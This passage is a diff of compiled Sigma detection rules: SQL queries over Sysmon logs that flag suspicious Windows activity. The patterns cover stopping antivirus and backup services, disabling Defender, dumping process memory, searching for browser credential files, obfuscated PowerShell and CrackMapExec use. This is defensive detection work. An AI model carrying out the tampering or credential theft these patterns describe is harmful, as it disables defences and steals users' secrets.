"Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Suspicious Compression Tool Parameters", - 
"id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "status": "experimental", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + 
"description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.015" + "attack.t1547" ], "falsepositives": [ - "Legitimate use" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", - "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": 
"e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. 
If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Potential Execution of Sysinternals Tools", + "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Legitimate use of SysInternals tools", + "Programs that use the same command line flag" ], - "level": "high", + "level": 
"low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_sysinternals_eula_accepted.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Where Execution", - "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "status": "experimental", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.discovery", - "attack.t1217" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND 
